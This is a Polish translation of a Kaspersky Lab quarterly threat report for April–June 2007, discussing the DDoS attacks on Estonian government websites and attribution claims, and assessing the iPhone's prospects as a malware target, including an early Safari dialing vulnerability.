Ewolucja szkodliwego oprogramowania: kwiecie艅 - czerwiec 2007

Alexander Gostev
Starszy analityk wirus贸w, Kaspersky Lab

Wst臋p

Nasz najnowszy raport kwartalny jest prawdopodobnie najbardziej nietypowy ze wszystkich dotychczas opublikowanych. Wydarzenia, jakie mia艂y miejsce w pierwszej po艂owie 2007 r., 艣wiadcz膮 o tym, 偶e sposoby rozprzestrzeniania zagro偶e艅 ewoluuj膮 od stosowania socjotechniki do coraz powszechniejszego wykorzystywania r贸偶nego rodzaju luk w zabezpieczeniach.

"Kryzys koncepcji" obserwowany w艣r贸d tw贸rc贸w wirus贸w, o kt贸rym pisali艣my pod koniec zesz艂ego roku (obawiaj膮c si臋, 偶e w najbli偶szej przysz艂o艣ci doprowadzi on do kryzysu) nadal trwa. Obecnie obserwujemy brak zupe艂nie nowych zagro偶e艅 oraz coraz wi臋ksz膮 komercjalizacj臋 艣rodowiska tworzenia wirus贸w. Jak ju偶 poprzednio stwierdzi艂em, pi艂eczka jest teraz po naszej stronie - po raz pierwszy od wielu lat firmy antywirusowe maj膮 przewag臋. Jedyn膮 rzecz膮, jaka interesuje tw贸rc贸w wirus贸w, jest zarabianie brudnych pieni臋dzy. Nie s膮 zdolni do wymy艣lania nowych koncepcji, wi臋c zamiast tego pr贸buj膮 "wycisn膮膰" co si臋 da ze starych technologii, dzi臋ki czemu bran偶a antywirusowa znajduje si臋 teraz w dobrej sytuacji. Najgorsze jest jednak to, 偶e ponad jako艣膰 przedk艂ada si臋 ilo艣膰. Ilo艣膰 prymitywnych szkodliwych program贸w, kt贸re kradn膮 co si臋 da, ci膮gle ro艣nie, jednak sytuacja bardziej przypomina przepychank臋 ni偶 wojn臋 "koncepcyjn膮".

W raporcie tym nie po艣wi臋cimy wiele miejsca szkodliwym programom. B臋dziemy analizowa膰 bezpiecze艅stwo informacji w szerszym uj臋ciu: przedstawimy informacje dotycz膮ce problem贸w Internetu, nowych technologii i luk. S膮 to obszary, w obr臋bie kt贸rych znajduj膮 si臋 dzisiaj kluczowe wyzwania, problemy, z kt贸rymi musz膮 si臋 zmierzy膰 firmy antywirusowe.

Estonia

Wydarzenia, jakie mia艂y miejsce pod koniec kwietnia i na pocz膮tku maja, pozostan膮 prawdopodobnie tymi, kt贸re wywo艂a艂y najwi臋cej dyskusji w 2007 r. Po raz pierwszy w historii politycy, przedstawiciele si艂 zbrojnych oraz eksperci komputerowi z ca艂ego 艣wiata podj臋li ten wci膮偶 wirtualny temat: cyberwojna.

Temat ten dotyczy艂 Estonii, a dok艂adniej atak贸w na kilkadziesi膮t serwer贸w w esto艅skim sektorze Internetu. Wszystko zacz臋艂o si臋 w po艂owie kwietnia, gdy esto艅ski rz膮d postanowi艂 usun膮膰 z jednego z talli艅skich plac贸w pomnik ku czci radzieckich 偶o艂nierzy poleg艂ych w II Wojnie 艢wiatowej podczas wyzwalania Tallinna. Decyzja ta spotka艂a si臋 z du偶ym sprzeciwem ze strony Rosji i doprowadzi艂a do pogorszenia stosunk贸w politycznych mi臋dzy tymi dwoma pa艅stwami.

Podobne napi臋cia w stosunkach mi臋dzy Rosj膮 i by艂ymi republikami Zwi膮zku Radzieckiego, kt贸re robi艂y wszystko co w ich mocy, aby odci膮膰 si臋 od radzieckiej przesz艂o艣ci, mia艂y miejsce ju偶 wcze艣niej. Incydent ten m贸g艂 pozosta膰 jedynie spraw膮 w sferze dyplomatycznej, gdyby nie na艂o偶y艂o si臋 na to jeszcze kilka innych czynnik贸w, i nie wydarzy艂o si臋 co艣 jeszcze.

27 kwietna esto艅skie strony internetowe prezydenta, premiera, parlamentu, policji oraz wielu ministr贸w uleg艂y przeci膮偶eniu z powodu ogromnej liczby 偶膮da艅 wysy艂anych z tysi臋cy komputer贸w zlokalizowanych na ca艂ym 艣wiecie. Mia艂o to miejsce wkr贸tce po tym, jak policja rozp臋dzi艂a demonstrant贸w w Tallinnie, kt贸rzy protestowali przeciwko usuni臋ciu pomnika. W starciu z policj膮 ponad 600 os贸b zosta艂o aresztowanych, a oko艂o stu odnios艂o obra偶enia.

Niemal natychmiast nast膮pi艂 kontratak za po艣rednictwem Internetu. Wed艂ug bada艅 przeprowadzonych przez ekspert贸w z fi艅skiej firmy F-Secure, 28 kwietnia ca艂kowicie niedost臋pne by艂y nast臋puj膮ce strony internetowe:

  • www.peaminister.ee (strona internetowa premiera): niedost臋pna
  • www.mkm.ee (Ministerstwo Gospodarki i Komunikacji): niedost臋pna
  • www.sisemin.gov.ee (Ministerstwo Spraw Wewn臋trznych): niedost臋pna
  • www.vm.ee (Ministerstwo Spraw Zewn臋trznych): niedost臋pna
  • www.valitsus.ee (Rz膮d Esto艅ski): niedost臋pna
  • www.riigikogu.ee (Parlament Esto艅ski): niedost臋pna

Pierwszy atak trwa艂 mniej wi臋cej do 4 maja. Ofiar膮 ataku DDoS pad艂o ponad dziesi臋膰 esto艅skich stron internetowych. Jednak wszyscy dobrze wiedzieli, 偶e najgorsze mia艂o dopiero nast膮pi膰. Zbli偶a艂 si臋 9 maja, Dzie艅 Zwyci臋stwa w Rosji.

Firma Arbor specjalizuj膮ca si臋 w ochronie przed atakami DoS opublikowa艂a w艂asne statystyki dotycz膮ce zdarze艅 w Estonii. Interesuj膮ce jest to, 偶e wed艂ug jej raportu, ataki rozpocz臋艂y si臋 3 maja, 2007 roku. Mo偶liwe, 偶e wtedy w艂a艣nie w艂adze esto艅skie zwr贸ci艂y si臋 do firmy Arbor o pomoc, poniewa偶 nie ma 偶adnych danych odno艣nie pierwszej fali atak贸w (od 27 kwietnia do 3 maja). Statystyki te mo偶na znale藕膰 tutaj: http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date:

Liczba atak贸w Data
21 2007-05-03
17 2007-05-04
31 2007-05-08
58 2007-05-09
1 2007-05-11

Jak wida膰, druga fala atak贸w rozpocz臋艂a si臋 8 maja, osi膮gaj膮c punkt krytyczny 9 maja. W tym miejscu nale偶y wyja艣ni膰, co oznacza w tym kontek艣cie termin "atak". Jak podaje firma Arbor, w ci膮gu dw贸ch tygodni odnotowano 128 unikatowych atak贸w DDoS, z kt贸rych 115 to typowe ataki ICMP-flood, 4 to ataki SYN, a pozosta艂e 9 to r贸偶ne warianty atak贸w, kt贸rych celem jest zwi臋kszenie ruchu sieciowego.

Oczywi艣cie to tylko niekt贸re z atak贸w, jakie mia艂y miejsce. Przyk艂ady te pokazuj膮, na jak ogromn膮 skal臋 zosta艂y przeprowadzone. Ponadto, ogromna wi臋kszo艣膰 atak贸w trwa艂a zaledwie godzin臋 lub kr贸cej. Tylko 7 atak贸w utrzyma艂o si臋 przez 10 godzin.

Atak przeciwko Estonii przeprowadzono na kilku poziomach jednocze艣nie. Opr贸cz atak贸w DoS na kluczowe strony rz膮dowe zmodyfikowano r贸wnie偶 dziesi膮tki innych esto艅skich stron internetowych. Wi臋kszo艣膰 z nich dzia艂a w oparciu o r贸偶ne silniki skryptowe, kt贸re posiadaj膮 wiele r贸偶nych luk, od CSS/XSS po wstrzykiwanie SQL.

Technicznie ataki te nie by艂y szczeg贸lnie skomplikowane i mog艂y zosta膰 przeprowadzone w ka偶dym innym czasie, jednak ostatnie zdarzenia przyci膮gn臋艂y haker贸w z ca艂ego 艣wiata, z kt贸rych wielu wykorzysta艂o sytuacj臋 do tego, aby podszkoli膰 i zastosowa膰 w praktyce swoje umiej臋tno艣ci.

Jednym z pierwszych portali, na kt贸ry w艂amano si臋, by艂 portal internetowy Partii Reform, na czele kt贸rej stoi premier Estonii Andrus Ansip. Tekst ze strony g艂贸wnej zast膮piono rzekomymi przeprosinami zaadresowanymi do rosyjskoj臋zycznych mieszka艅c贸w Estonii. "Premier prosi o wybaczenie! Premier i rz膮d Estonii b艂aga o wybaczenie ca艂膮 rosyjsk膮 ludno艣膰 Estonii i zobowi膮zuje si臋 przywr贸ci膰 pomnik Br膮zowego 呕o艂nierza na nale偶ne mu miejsce" - napisali hakerzy.

W mi臋dzyczasie ofiar膮 atak贸w pad艂y r贸wnie偶 rosyjskie strony internetowe. "3 maja tego roku strona internetowa prezydenta Rosji pad艂a ofiar膮 atak贸w haker贸w, przeprowadzonych na bezprecedensow膮 skal臋 z serwer贸w zlokalizowanych najprawdopodobniej w regionie nadba艂tyckim" - poinformowa艂a agencja informacyjna RIA Novosti, cytuj膮c jedno ze 藕r贸de艂 na Kremlu.

Jednak dzi臋ki systemowi tworzenia kopii zapasowych oraz wsp贸艂czesnemu systemowi bezpiecze艅stwa strona internetowa prezydenta nie straci艂a kontroli. 殴r贸d艂o na Kremlu przyzna艂o, 偶e "wyst膮pi艂y pewne problemy", dodaj膮c , 偶e "ataki haker贸w na instytucje rz膮dowe r贸偶nych pa艅stw s膮 niestety na porz膮dku dziennym."

Celem atak贸w sta艂y si臋 r贸wnie偶 rosyjskie media, takie jak radio Echo Moskwy oraz gazeta Kommersant. W przypadku niekt贸rych z nich nie by艂o 偶adnego zwi膮zku mi臋dzy ich ofiarami a wydarzeniami w Estonii.

Sprawcami atak贸w na strony internetowe swoich bezpo艣rednich rosyjskich przeciwnik贸w byli prawdopodobnie esto艅scy hakerzy. 9 maja w艂amano si臋 na stron臋 internetow膮 obro艅c贸w pomnika. Strona g艂贸wna nie zawiera艂a ju偶 informacji organizacji "Stra偶 Nocna" (web-dozor.ru) - zosta艂y one zast膮pione bannerem z has艂em: "Proud to be Estonian" oraz esto艅sk膮 flag膮 z napisem "Estonia Forever!" Poza tym hakerzy zaatakowali jeszcze co najmniej jedna stron臋: 1-net.ru.

Jak wida膰 na poni偶szych zrzutach ekranu, by艂a to bezpo艣rednia wymiana "wirtualnych" cios贸w:


(c) f-secure


(c) f-secure

Jak zareagowa艂y na to w艂adze esto艅skie? Najpierw esto艅ska policja aresztowa艂a 19-letniego mieszka艅ca Tallinna pod zarzutem przeprowadzenia cyberatak贸w na rz膮dowe strony internetowe. P贸藕niej jednak sprawy przybra艂y zupe艂nie nieoczekiwany obr贸t. Esto艅scy politycy z艂amali niepisan膮 zasad臋, oskar偶aj膮c o zorganizowanie atak贸w rosyjskie s艂u偶by specjalne - po raz pierwszy zosta艂o u偶yte na tym szczeblu s艂owo "cyberwojna".

Nie jest dla nikogo tajemnic膮, 偶e najbardziej znacz膮ce rz膮dowe s艂u偶by specjalne maj膮 specjalne wydzia艂y ds. bezpiecze艅stwa elektronicznych zasob贸w kraju i s膮 uprawnione do podejmowania w tym celu odpowiednich dzia艂a艅. Nazywamy to "elektronicznym wywiadem". Podobne oddzia艂y istniej膮 w ameryka艅skiej armii, a ich cz艂onkowie uczestniczyli nawet, chocia偶 bez wi臋kszych sukces贸w, w zawodach dla haker贸w o to, kt贸remu z nich uda si臋 spenetrowa膰 zasoby internetowe.

By艂 to jednak pierwszy przypadek w historii, gdy jeden rz膮d oskar偶y艂 inny o przeprowadzenie cyberataku. Nie zdarzy艂o si臋 to nawet w czasie konfliktu indyjsko-pakista艅skiego, gdy pod koniec lat dziewi臋膰dziesi膮tych hakerzy obu tych pa艅stw toczyli ze sob膮 wirtualn膮 bitw臋 w Internecie. W tych okoliczno艣ciach pojawi艂 si臋 robak Lentin (Yaha) - jeden z najbardziej destrukcyjnych robak贸w pocztowych ostatniej dekady.

Nie mia艂o to miejsca nawet po interwencji NATO w konflikt tocz膮cy si臋 w Jugos艂awii i zbombardowaniu Serbii, gdy serbscy hakerzy stworzyli sojusz z hakerami z innych pa艅stw i zaatakowali zasoby sieciowe Stan贸w Zjednoczonych oraz NATO.

Podobne oskar偶enia nie pad艂y nawet podczas licznych zawirowa艅 w stosunkach mi臋dzy Chinami i Japoni膮, gdy ofiar膮 atak贸w DoS pad艂y japo艅skie internetowe strony rz膮dowe.

Nie sta艂o si臋 to nawet wtedy, gdy departamenty i agencje ameryka艅skiego rz膮du sta艂y si臋 (i nadal s膮) celem atak贸w chi艅skich ugrupowa艅 haker贸w, kt贸re cz臋sto zdobywaj膮 dost臋p do tajnych informacji.

Wprawdzie ataki na esto艅skie strony internetowe by艂y wyrazem zwyk艂ego wandalizmu, jednak komu艣 wyra藕nie zale偶a艂o na tym, aby przenie艣膰 konflikt na nowy poziom. Najpierw, Urmas Paet, esto艅ski Minister do Spraw Zagranicznych, o艣wiadczy艂, 偶e hakerzy dzia艂ali w imieniu Rosji, wykorzystuj膮c mi臋dzy innymi komputery mieszcz膮ce si臋 w instytucjach rz膮dowych. Nast臋pnie, Yaak Aaviksoo, esto艅ski Minister Obrony zaproponowa艂, aby uzna膰 te cyberataki za form臋 atak贸w zbrojnych. "Obecnie NATO nie uznaje cyberatak贸w za ataki zbrojne. To oznacza, 偶e w stosunku do pa艅stw nale偶膮cych do NATO, kt贸re pad艂y ofiar膮 tych atak贸w, nie stosuje si臋 automatycznie pi膮tego artyku艂u Traktatu P贸艂nocnoatlantyckiego m贸wi膮cego o zapewnieniu ochrony wojskowej. 呕aden Minister Obrony NATO nie zaliczy艂by dzisiaj cyberatak贸w do atak贸w zbrojnych. Kwesti膮 t膮 trzeba si臋 jak najszybciej zaj膮膰".

Tak wi臋c Estonia chcia艂a, aby zapewniono jej obron臋 wojskow膮 przed atakami z Internetu - sytuacja stawa艂a si臋 powa偶na. Przy tego rodzaju o艣wiadczeniach niezb臋dne by艂yby przynajmniej niepodwa偶alne dowody udzia艂u rosyjskiego rz膮du w incydencie. Estonia nie zdo艂a艂a przedstawi膰 takich dowod贸w przez kilka miesi臋cy po tym, jak rozpocz臋艂y si臋 ataki. R贸wnie偶 eksperci z NATO nie zdo艂ali niczego ustali膰, gdy na pocz膮tku maja pospieszyli do Tallinna, 偶eby "uratowa膰 swojego sojusznika". Zasadniczo, oskar偶enia o udzia艂 rosyjskiego rz膮du w atakach opiera艂y si臋 na jedynie na fakcie, 偶e strona internetowa prezydenta Estonii zosta艂a odwiedzona z adresu IP, kt贸ry "nale偶y do pracownika administracji rosyjskiego prezydenta". Wiedza s艂u偶b esto艅skich dotycz膮ca w艂a艣cicieli wszystkich rosyjskich adres贸w IP jest godna podziwu, podobnie jak ich wiedza na temat tego, jak "trudno" jest sfa艂szowa膰 taki adres.

Jednak cyberwojna zosta艂a wypowiedziana. Nagle do Estonii zjechali si臋 eksperci z ca艂ego 艣wiata - ze Stan贸w Zjednoczonych, Europy i Izraela. Niekt贸rzy przybyli, aby pom贸c w walce z zagro偶eniem, inni po bezcenne do艣wiadczenie - przyjrzenie si臋 konfliktowi z bliska i wyci膮gni臋cie z niego nauki, kt贸ra mog艂aby przyczyni膰 si臋 do zwi臋kszenia bezpiecze艅stwa ich w艂asnych kraj贸w.

A co dzia艂o si臋 w rosyjskim Internecie w tym czasie? Podczas gdy wszyscy zaj臋ci byli oskar偶aniem rosyjskich w艂adz, nikt nie pomy艣la艂 o tym, aby zapyta膰 rosyjskich internaut贸w, co sadz膮 na temat incydentu z Br膮zowym 呕o艂nierzem. Ich zdania by艂y w przewa偶aj膮cej wi臋kszo艣ci anty-esto艅skie i gdy tylko rozpocz臋艂y si臋 konflikty z policj膮, wielu rosyjskich internaut贸w, kt贸rzy nie mogli zaprotestowa膰 osobi艣cie, wyrazi艂o sw贸j sprzeciw online - w formie atak贸w DoS.

Trudno dzi艣 okre艣li膰, kiedy i gdzie narodzi艂 si臋 pomys艂 przeprowadzenia atak贸w polegaj膮cych na generowaniu wzmo偶onego ruchu. Jego autorami byli prawdopodobnie hakerzy z tej samej grupy, kt贸ra w przesz艂o艣ci przeprowadzi艂a podobne ataki na strony internetowe czecze艅skich rebeliant贸w. Do艣wiadczenie to okaza艂o si臋 cenne i zosta艂o wykorzystane powt贸rnie. R贸偶ne programy, kt贸re w ogromnej ilo艣ci pojawi艂y si臋 na forach i stronach internetowych, wysy艂a艂y liczne 偶膮dania do esto艅skich stron internetowych. Ka偶dy m贸g艂 pobra膰 taki program i uruchomi膰 go na swoim komputerze. Z technologicznego punktu widzenia mamy tu do czynienia z botnetem. Jest to jednak botnet dobrowolny i stworzony za zgod膮 w艂a艣cicieli wykorzystywanych komputer贸w, kt贸rzy doskonale wiedz膮, co robi膮 i robi膮 to ca艂kowicie celowo. Przygl膮daj膮c si臋 danym statystycznym dotycz膮cym atak贸w zgromadzonych przez ekspert贸w z firmy Arbor, widzimy, 偶e ogromna wi臋kszo艣膰 atak贸w trwa艂a mniej ni偶 godzin臋. Czy mo偶na mie膰 pewno艣膰, 偶e rosyjskie s艂u偶by specjalne "wypo偶yczy艂y" od haker贸w botnety na tak kr贸tki czas?

Naturalnie, niekt贸re ataki zosta艂y przeprowadzone z "prawdziwych" botnet贸w utworzonych z zainfekowanych wcze艣niej komputer贸w, nie znaczy to jednak, 偶e nale偶y umniejsza膰 znaczenie "r臋cznego" ataku. Je艣li chcemy ju偶 m贸wi膰 o cyberwojnie, okre艣lenie partyzantka by艂oby trafniejsze.

Warto doda膰, 偶e 偶adnej firmie antywirusowej nie uda艂o si臋 znale藕膰 szkodliwych program贸w, kt贸re zosta艂y stworzone z my艣l膮 o przeprowadzeniu atak贸w na esto艅skie strony internetowe.

Ataki przeciwko Estonii usta艂y. Eksperci powr贸cili do swoich kraj贸w, producenci sprz臋tu sieciowego zawarli nowe kontrakty, dziennikarze napisali dziesi膮tki artyku艂贸w na temat tego, co si臋 wydarzy艂o. Koniec ko艅c贸w, pomnik zosta艂 przeniesiony na nowe miejsce, a szcz膮tki radzieckich 偶o艂nierzy ekshumowane. Dmitri, 19- latek z Tallinna, jedyny podejrzany w zwi膮zku z atakami, zosta艂 wypuszczony na wolno艣膰 z powodu braku dowod贸w.

"Nie s膮dz臋, aby by艂a to Rosja, ale jak to udowodni膰?" - pyta Gadi Evron, ekspert ds bezpiecze艅stwa IT z Izraela. Evron pojecha艂 do Tallinna i przeprowadzi艂 dochodzenie post-mortem esto艅skiego systemu. "Internet sprzyja odpieraniu wszelkich zarzut贸w".

"Je艣li powstan膮 napi臋cia polityczne, z pewno艣ci膮 ich skutki ujrzymy w wirtualnych sieciach" - powiedzia艂 Evron w nawi膮zaniu do atak贸w na du艅skie strony internetowe po tym, jak du艅ska gazeta opublikowa艂a karykatury przedstawiaj膮ce proroka Mohammeda.

Pokojowo nastawiona spo艂eczno艣膰 komputerowa bawi si臋 teraz s艂owami "cyberwojna" i "cyberterroryzm", przyklejaj膮c Rosji etykietk臋 pierwszego pa艅stwa, kt贸re u偶y艂o "cyfrowej bomby". Eksperci tworz膮 scenariusze prawdziwych wojen komputerowych:

"M贸wi si臋 o ataku kaskadowym" - powiedzia艂 Mikhel Tammet, szef Departamentu ds komunikacji oraz IT dzia艂aj膮cego w ramach esto艅skiego Ministerstwa Obrony, o jednym z mo偶liwych scenariuszy. "Najpierw, z powodu masowych wysy艂ek z botnet贸w, o kt贸rych pisa艂o poprzednio FBI, pojawi膮 si臋 trudno艣ci z uzyskaniem dost臋pu do popularnych internetowych portali informacyjnych. P贸藕niej wyst膮pi膮 zak艂贸cenia w dzia艂aniu us艂ug poczty elektronicznej, a hakerzy wykorzystaj膮 to jako przykrywk臋 do przenikni臋cia do serwis贸w rz膮dowych, firm z bran偶y komunikacji, transportu oraz finans贸w, co mog艂oby zdestabilizowa膰 funkcjonowanie systemu spo艂ecznego jako ca艂o艣ci".

Podczas gdy wyszukiwarki i rz膮dy na ca艂ym 艣wiecie wprowadzaj膮 r贸偶ne ograniczenia dotycz膮ce dost臋pu do informacji w Internecie zawieraj膮cych instrukcje stworzenia bomby, kwestia cyberterroryzmu nie zosta艂a dog艂臋bnie przedyskutowana z uwzgl臋dnieniem obecnego stanu rzeczy. Eksperci z Kaspersky Lab zawsze byli zdania, 偶e publikowanie informacji o r贸偶nych sposobach eliminowania istotnych funkcji danego celu jest bezwzgl臋dnie naganne. Nie ma w膮tpliwo艣ci, 偶e wszelkie takie informacje mog艂yby sprowokowa膰 pewne ekstremistyczne ugrupowania do podj臋cia pr贸b zrealizowania takiego scenariusza.

Puszka Pandory zosta艂a otwarta. Pozostaje tylko pytanie, kto na tym zyska?

iPhone

Najwi臋kszym globalnym wydarzeniem w bran偶y telefonii kom贸rkowej w drugim kwartale 2007 r. - i prawdopodobnie w ca艂ym roku, by艂o pojawienie si臋 w sprzeda偶y iPhone'a firmy Apple.


Miliony ameryka艅skich u偶ytkownik贸w sta艂y niecierpliwie w kolejce, czekaj膮c na rozpocz臋cie sprzeda偶y, a wielu ustawi艂o si臋 przed sklepem ju偶 kilka dni przed oficjaln膮 dat膮 sprzeda偶y. W mi臋dzyczasie, eksperci ds. bezpiecze艅stwa IT zastanawiali si臋 nad tym, w jaki spos贸b iPhone zmieni krajobraz telefonii kom贸rkowej oraz przeci臋tny poziom bezpiecze艅stwa telefon贸w. Czy jego ogromna popularno艣膰 nie b臋dzie przyczyn膮 naruszenia stagnacji w 艣wiecie wirus贸w mobilnych?

Kaspersky Lab bacznie przygl膮da si臋 mobilnym zagro偶eniom. Dok艂adnie trzy lata temu jako pierwsi natkn臋li艣my si臋 na wirusy mobilne.

Aby oceni膰 prawdopodobie艅stwo, z jakim szkodliwe programy b臋d膮 tworzone dla r贸偶nych urz膮dze艅 i system贸w operacyjnych, stosujemy system oparty na trzech kryteriach:

  1. Popularno艣膰 systemu oraz zakres, w jakim jest on powszechnie wykorzystywany;
  2. Dokumentacja - dost臋pno艣膰 r贸偶nego rodzaju kompletnej dokumentacji dotycz膮cej systemu;
  3. Bezpiecze艅stwo - brak zabezpiecze艅 systemu, ewentualnie znane luki w zabezpieczeniu systemu lub jego aplikacji.

Ka偶de z tych kryteri贸w jest istotne. Je艣li zostan膮 spe艂nione wszystkie z nich, mo偶na z du偶ym prawdopodobie艅stwem oczekiwa膰 pojawienia si臋 szkodliwych program贸w dla danego systemu.

Spr贸bujmy zastosowa膰 te kryteria do iPhone'a.

Popularno艣膰

W ci膮gu pierwszych trzech dni od momentu pojawienia si臋 iPhone'a w sprzeda偶y Apple sprzeda艂 prawie p贸艂 miliona tych nowych urz膮dze艅. W blogu na stronie egadgetmobile.com mo偶na by艂o przeczyta膰, 偶e w ci膮gu pierwszych dziesi臋ciu dni lipca sprzedano ponad milion iPhone'贸w. Analitycy spodziewaj膮 si臋, 偶e w ci膮gu pierwszych 18 miesi臋cy sprzeda偶 si臋gnie 13,5 milion贸w sztuk.

Czy liczby te wskazuj膮 na du偶膮 popularno艣膰?

W 2003 roku na ca艂ym 艣wiecie sprzedano 6,7 milion贸w urz膮dze艅 przeno艣nych dzia艂aj膮cych pod kontrol膮 systemu operacyjnego Symbian, a w grudniu 2003 r. sprzedano ponad milion smartfon贸w.

W 2004 roku, gdy pojawi艂 si臋 Cabir - pierwszy robak dla urz膮dze艅 przeno艣nych - by艂o ju偶 15 milion贸w telefon贸w pracuj膮cych pod kontrol膮 systemu Symbian, z kt贸rych 70% by艂o produktami firmy Nokia. W sumie, w 2004 roku Symbian posiada艂 38% rynku smartfon贸w.

W drugim kwartale 2005 r. sprzedano 7,8 milion贸w telefon贸w (dla por贸wnania w drugim kwartale 2004 r. sprzedano 2,4 mln.). Natomiast w pierwszej po艂owie 2005 r. sprzedano og贸艂em 14,5 milion贸w telefon贸w kom贸rkowych dzia艂aj膮cych pod kontrol膮 Symbiana.

Za艂o偶enia, 偶e do ko艅ca 2008 sprzeda偶 iPhone'贸w si臋gnie 13,5 milion贸w, opieraj膮 si臋 na wysoko艣ci wp艂yw贸w ze sprzeda偶y urz膮dze艅 z Symbianem - w 2004 r. sprzedano ich 15 milion贸w. Na podstawie tych liczb mo偶na stwierdzi膰, 偶e w roku 2008 wirusy dla iPhone'a stan膮 si臋 rzeczywisto艣ci膮. Prawdopodobnie b臋dzie to mia艂o miejsce przed ko艅cem roku dzi臋ki du偶emu zapotrzebowaniu u偶ytkownik贸w na tego typu urz膮dzenia oraz intensywnej kampanii reklamowej.

Ju偶 teraz iPhone cieszy si臋 popularno艣ci膮, mimo 偶e wyniki ze sprzeda偶y nie s膮 jeszcze tak wysokie. Dane z analizy przeprowadzonej na du偶膮 skal臋 przez pracownik贸w Lightspeed Research tydzie艅 po oficjalnej zapowiedzi przez programist贸w Apple d艂ugo oczekiwanego smartfonu pokazuj膮, 偶e jeden na trzech Amerykan贸w chce mie膰 iPhone'a. Oko艂o 8% respondent贸w planuje naby膰 ten telefon w ci膮gu nast臋pnych 3 miesi臋cy, a 22% zamierza kupi膰 iPhone "kiedy艣 w przysz艂o艣ci".

Nale偶y jednak uwzgl臋dni膰 jeszcze dwa kryteria.

Dokumentacja

Apple og艂osi艂, 偶e iPhone dzia艂a pod kontrol膮 specjalnej wersji systemu Mac OS X. Oficjalnie nie wyja艣niono jeszcze, w jaki spos贸b system operacyjny dla urz膮dze艅 przeno艣nych r贸偶ni si臋 od wersji dla komputer贸w firmy Apple, jednak r贸偶nice s膮 prawdopodobnie niewielkie. Zwykle wymaga to zoptymalizowania wersji, tak aby mog艂a by膰 u偶ytkowana bez pomocy klawiatury i myszy oraz dodatkowych aplikacji. Wewn臋trzny system operacyjny okre艣lany jest jako "OS X 1.0 (1A543a)."

Procesor iPhone'a zbudowany jest w oparciu o architektur臋 ARM, co oznacza, 偶e mog膮 dzia艂a膰 na nim aplikacje napisane przy pomocy assemblera ARM, dla kt贸rego dost臋pna jest bardzo dobra i szczeg贸艂owa dokumentacj臋.

Tak wi臋c kryterium "dokumentacja" r贸wnie偶 jest spe艂nione.

Bezpiecze艅stwo

Istnieje jeszcze jedno kryterium, najprawdopodobniej najwa偶niejsze ze wszystkich trzech: poziom bezpiecze艅stwa (lub jego brak) oraz obecno艣膰 luk.

Og贸lnie, Apple, a w szczeg贸lno艣ci system operacyjny i aplikacje Apple'a, nie wypadaj膮 najlepiej, je偶eli chodzi o problem luk. Luki istniej膮 i wiele z nich jest krytycznych. Ich wykrycie zawdzi臋czamy w du偶ej mierze nowej fali u偶ytkownik贸w-entuzjast贸w systemu Mac OS i wzrostowi jego popularno艣ci. To spowodowa艂o, 偶e hakerzy zacz臋li "kopa膰 g艂臋biej". Ju偶 wcze艣niej pojawi艂y si臋 robaki sieciowe dla systemu Mac OS X, kt贸re w celu rozprzestrzeniania si臋 wykorzystuj膮 luki w zabezpieczeniach. Nie ma powodu przypuszcza膰, 偶e takie same problemy nie b臋d膮 dotyczy艂y systemu operacyjnego iPhone'a.

Na pocz膮tku czerwca eksperci z SPI Dynamics poinformowali o pierwszej luce w zabezpieczeniach iPhone'a, kt贸ra dotyczy艂a systemu wybierania numer贸w wykorzystuj膮cego specjalne, zautomatyzowane rozwi膮zania wbudowane w przegl膮dark臋 Safari. W pewnych okoliczno艣ciach szkodliwy u偶ytkownik m贸g艂by przekierowa膰 rozmowy z numeru w艂a艣ciciela telefonu na inny numer, wykonywa膰 rozmowy telefoniczne bez wiedzy u偶ytkownika, uniemo偶liwia膰 wykonywanie po艂膮cze艅 i inicjowa膰 nieko艅cz膮cy si臋 cykl wybierania numeru, kt贸ry mo偶na zatrzyma膰 tylko przez wy艂膮czenie i ponowne w艂膮czenie urz膮dzenia.

Teoretycznie istnieje kilka sposob贸w przeprowadzenia ataku, jak mo偶na przeczyta膰 na stronie internetowej SPI Dynamics. Szkodliwi u偶ytkownicy mog膮 pr贸bowa膰 zwabi膰 potencjaln膮 ofiar臋 na zainfekowan膮 stron臋 internetow膮. Ewentualnie, atak m贸g艂by zosta膰 zainicjowany przez wykorzystanie legalnych zasob贸w internetowych podatnych na ataki CSS (skrypty Cross-Site).

"Poniewa偶 luka ta mo偶e zosta膰 uruchomiona ze stron internetowych, problem ten mo偶e dotkn膮膰 ka偶dego, kto posiada iPhone'a" - powiedzia艂 Bill Hoffman, analityk z firmy SPI. To oznacza, 偶e mamy do czynienia z powa偶n膮 luk膮.

iPhone posiada wiele charakterystycznych cech, kt贸re mog膮 skomplikowa膰 偶ycie tw贸rcom wirus贸w. Po pierwsze, mo偶e wykorzystywa膰 Bluetootha tylko w celu po艂膮czenia si臋 z urz膮dzeniami w technologii Bluetooth. Bluetooth nie mo偶e by膰 u偶ywany do przesy艂ania plik贸w lub synchronizowania telefonu z komputerem osobistym. W艂a艣ciwo艣膰 ta stawia pod znakiem zapytania mo偶liwo艣膰 istnienia robak贸w takich jak Cabir (kt贸re atakuj膮 system Symbian). Brak mo偶liwo艣ci przesy艂ania plik贸w za po艣rednictwem Bluetootha z pewno艣ci膮 pozbawi przysz艂e robaki ich najwa偶niejszego sposobu rozprzestrzeniania si臋.

Drugim ograniczeniem jest... brak mo偶liwo艣ci wysy艂ania MMS-贸w! Funkcja ta, (a konkretnie jej brak) wywo艂a艂a sporo krytyki ze strony u偶ytkownik贸w, jednak dla wirus贸w oznacza to to samo, co dla robak贸w oznacza brak mo偶liwo艣ci przesy艂ania plik贸w za pomoc膮 Bluetootha. Je艣li wykluczymy MMS-y, odpadnie druga najbardziej popularna metoda rozprzestrzeniania mobilnych szkodliwych program贸w. Dlatego ComWar, robak atakuj膮cy system Symbian, prawdopodobnie nie przedostanie si臋 do iPhone'a.

Bez w膮tpienia s膮 to jedne z g艂贸wnych ogranicze艅. Najbardziej interesuj膮ce jest jednak to, 偶e nie s膮 one wynikiem zbadania przez firm臋 Apple potencjalnych problem贸w z robakami mobilnymi lub jej decyzji zwi臋kszenia bezpiecze艅stwa urz膮dzenia.

